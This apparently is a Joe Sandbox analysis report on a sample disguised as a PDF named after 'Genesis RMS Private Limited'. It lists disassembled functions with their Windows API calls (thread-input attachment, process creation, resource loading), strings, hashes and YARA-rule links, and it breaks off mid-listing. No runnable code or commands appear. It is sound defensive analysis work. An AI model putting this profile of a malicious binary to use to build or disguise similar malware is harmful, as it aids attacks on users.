                                                                                                                      • Opcode ID: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                                                                                                                      • Instruction ID: ff0cba0e87fb21518449493418a2e056f609604e1d8d76e820356dcf828760de
                                                                                                                      • Opcode Fuzzy Hash: 53649693175505baae6559a6668054c230fc40174d38613e1d86cd6b278db831
                                                                                                                      • Instruction Fuzzy Hash: 1E318235A00209DFDB04EF64CC89BEE77B8FF84710F14802AE902D7291DBB99946C791
                                                                                                                      Function 007A9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007A94F6
                                                                                                                      • GetDlgCtrlID.USER32 ref: 007A9501
                                                                                                                      • GetParent.USER32 ref: 007A951D
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9520
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 007A9529
                                                                                                                      • GetParent.USER32(?), ref: 007A9545
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9548
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                                                                                                                      • Instruction ID: 08724a79b6b88ac44402238014b6a691cca4d34018d1f3295fbd10bb39c97543
                                                                                                                      • Opcode Fuzzy Hash: b1e59bbee506c36c1d65f9f3fd4f81ffe93d847525edc694b02e45dd091cfe71
                                                                                                                      • Instruction Fuzzy Hash: 7B21A370D00104FBCF059B64CC89DEEBB75EF8A300F104216F962972E2DB7D9929DA20
                                                                                                                      Function 007A955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                                                                                                                        • Part of subcall function 007AB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 007AB0E7
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A95DF
                                                                                                                      • GetDlgCtrlID.USER32 ref: 007A95EA
                                                                                                                      • GetParent.USER32 ref: 007A9606
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9609
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 007A9612
                                                                                                                      • GetParent.USER32(?), ref: 007A962E
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9631
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                                                                                                                      • Instruction ID: b173e6d14b590081fd8d49b943c647ab68e84662442f0a82ab2a9c2d6789e735
                                                                                                                      • Opcode Fuzzy Hash: ce4d032f2888d705574f657b631676f9f4893575ed0dfc628391bc33fc93785d
                                                                                                                      • Instruction Fuzzy Hash: 4D21A474D01104BBDF05AB60CC89EFEBB75EF49300F104116F962972E2DB7D9529DA20
                                                                                                                      Function 007A9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 007A9651
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 007A9666
                                                                                                                      • _wcscmp.LIBCMT ref: 007A9678
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007A96F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                      • Opcode ID: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                                                                                                                      • Instruction ID: bf71c48d9247deb53078dd23ab69c56f3758d00ea6d6471590a6af07cb3bed9c
                                                                                                                      • Opcode Fuzzy Hash: ac43e97dd62af9090e699721052502fea2614cdebbfe092318c6d02c47ca5494
                                                                                                                      • Instruction Fuzzy Hash: 4A112977248307FAFA112621DC0BDE6779CDF46770F204226FB15E50D2FEAE69205958
                                                                                                                      Function 007B4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __swprintf.LIBCMT ref: 007B419D
                                                                                                                      • __swprintf.LIBCMT ref: 007B41AA
                                                                                                                        • Part of subcall function 007738D8: __woutput_l.LIBCMT ref: 00773931
                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 007B41D4
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 007B41E0
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 007B41ED
                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 007B420D
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 007B421F
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 007B422E
                                                                                                                      • LockResource.KERNEL32(?), ref: 007B423A
                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007B429B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1433390588-0
                                                                                                                      • Opcode ID: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                                                                                                                      • Instruction ID: 2ae77b4dbed4755789f0c56a71048ce745354da3ce1cb21ede51acd0314912be
                                                                                                                      • Opcode Fuzzy Hash: 4c5de2c86a035ea123ef7fb2805734fb57b9d271842e54d63b64ce08024e59ac
                                                                                                                      • Instruction Fuzzy Hash: FE319271A0521AABDB119FA0DC48EFF7BBDFF08341F008529F906D6152E738DA519BA4
                                                                                                                      Function 007B16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 007B1700
                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B1714
                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 007B171B
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B172A
                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 007B173C
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B1755
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0778,?,00000001), ref: 007B1767
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B17AC
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B17C1
                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0778,?,00000001), ref: 007B17CC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2156557900-0
                                                                                                                      • Opcode ID: c4aa6931bb93f86b69b19a91b13b4f979040baf74de62703115b6ca33aad17be
                                                                                                                      • Instruction ID: c2adc0cda2b8e681891ef00b5bcab5e045784e0fe7fa844634e979a7f2f68c68
                                                                                                                      • Opcode Fuzzy Hash: c4aa6931bb93f86b69b19a91b13b4f979040baf74de62703115b6ca33aad17be
                                                                                                                      • Instruction Fuzzy Hash: 25319A75604204BBEB119F24DC98BEA3BBEEF15721F908069F801C72A0DF789E40CB60
                                                                                                                      Function 0075FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0075FC06
                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 0075FCA5
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 0075FDFC
                                                                                                                      • DestroyWindow.USER32(?), ref: 00794A00
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00794A65
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00794A92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                      • Opcode ID: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                                                                                                                      • Instruction ID: 1482d2b7ab27142e979d61e7afd37bef1cb22b7e68837d1a223b61546660cdae
                                                                                                                      • Opcode Fuzzy Hash: 0fb74260a12bd529fff45e2aa4a5355cfa1e4779d522de27e1c2a3d87aeab2f4
                                                                                                                      • Instruction Fuzzy Hash: 04A19E70701212CFCB29EF14D899EA9F764EF04701F1482ADE90AAB251DB78ED16CF94
                                                                                                                      Function 007C9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$_memset
                                                                                                                      • String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                      • API String ID: 2862541840-1439926319
                                                                                                                      • Opcode ID: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                                                                                                                      • Instruction ID: 526f02aa8883b03e9f5b3ebd566efc704cafb0ce3aa34b1a6847b213bb67cccb
                                                                                                                      • Opcode Fuzzy Hash: 758dc4965228de58e727be0fa58a2b71ed3dbaf06e3230ef0e4807792b9d3acd
                                                                                                                      • Instruction Fuzzy Hash: B5919D71A00219EBDF64DFA5D848FAEBBB8EF45710F10815DFA15AB280D7789905CFA0
                                                                                                                      Function 007AA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnumChildWindows.USER32(?,007AAA64), ref: 007AA9A2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChildEnumWindows
                                                                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                      • API String ID: 3555792229-1603158881
                                                                                                                      • Opcode ID: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                                                                                                                      • Instruction ID: d208af2aa62b41fae6551e868608e3000be3184ee39fa27290e98e355b6a49de
                                                                                                                      • Opcode Fuzzy Hash: fd1e4e76138677ede8a0eb250d6720a6fe00bed87d2843fba4f7fa2e03e8b63a
                                                                                                                      • Instruction Fuzzy Hash: 3791B270A00606EBCF58DF70C485BEAFB74BF45340F108219D99AA7181DF387A59CB91
                                                                                                                      Function 00752E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00752EAE
                                                                                                                        • Part of subcall function 00751DB3: GetClientRect.USER32(?,?), ref: 00751DDC
                                                                                                                        • Part of subcall function 00751DB3: GetWindowRect.USER32(?,?), ref: 00751E1D
                                                                                                                        • Part of subcall function 00751DB3: ScreenToClient.USER32(?,?), ref: 00751E45
                                                                                                                      • GetDC.USER32 ref: 0078CF82
                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078CF95
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0078CFA3
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0078CFB8
                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0078CFC0
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078D04B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                      • Opcode ID: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                                                                                                                      • Instruction ID: 1571bfc8dee5bedfa91f992124e5afb9d3ef87637551670518251c44f53cd814
                                                                                                                      • Opcode Fuzzy Hash: 29da83d3702020537df9a7555863aeb0f7092b66ad552d033f38373516a81f15
                                                                                                                      • Instruction Fuzzy Hash: 8171E531400205DFCF21EF64CC85AFA3BB5FF49311F14826AEE555A2A6D7398C56DB60
                                                                                                                      Function 007DC27C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                                        • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                                                                                                                        • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007DC2E4
                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 007DC2EA
                                                                                                                      • ReleaseCapture.USER32 ref: 007DC2F0
                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 007DC39A
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007DC3AD
                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007DC48F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                      • Opcode ID: 03366b0333ff2e920971a0a542a00662b199f034b7014575806372275846961e
                                                                                                                      • Instruction ID: bc204e2f7c600eb746b2fcc0e283aa104ea09ca696208547b2ff7b5943c55a5e
                                                                                                                      • Opcode Fuzzy Hash: 03366b0333ff2e920971a0a542a00662b199f034b7014575806372275846961e
                                                                                                                      • Instruction Fuzzy Hash: DE517B70204205EFD700DF24C85ABAA7BF5FF88311F04852AF996872E1DB79A959CB52
                                                                                                                      Function 007C8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007DF910), ref: 007C903D
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007DF910), ref: 007C9071
                                                                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007C91EB
                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 007C9215
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 560350794-0
                                                                                                                      • Opcode ID: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                                                                                                                      • Instruction ID: 7651111cc01aac059f46ec118eb4313b66be631b3fe3e69b9a4aa68ef64af868
                                                                                                                      • Opcode Fuzzy Hash: 9d28715d209556877ffb8717301ca7b5cdcae70afdfec746eff318d7865728ce
                                                                                                                      • Instruction Fuzzy Hash: 6BF12871A00209EFDB44DF94C888EAEB7B9FF49315F14805DFA16AB250DB35AE46CB50
                                                                                                                      Function 007CF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 007CF9C9
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB5C
                                                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CFB80
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBC0
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CFBE2
                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFD5E
                                                                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFD90
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007CFDBF
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 007CFE36
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4090791747-0
                                                                                                                      • Opcode ID: 396e0668a58f3e8dfc75705ad3afe02fa2faca29374877a6e84e03153c45aca3
                                                                                                                      • Instruction ID: 95a25f251243c343316f0930913ed12e52de14568e8fc66f86df4eb18c0ff3f7
                                                                                                                      • Opcode Fuzzy Hash: 396e0668a58f3e8dfc75705ad3afe02fa2faca29374877a6e84e03153c45aca3
                                                                                                                      • Instruction Fuzzy Hash: ACE1C331204301DFCB14EF24C895F6ABBE1AF85354F14856DF89A8B2A2DB79EC45CB52
                                                                                                                      Function 007B4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007B38D3,?), ref: 007B48C7
                                                                                                                        • Part of subcall function 007B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007B38D3,?), ref: 007B48E0
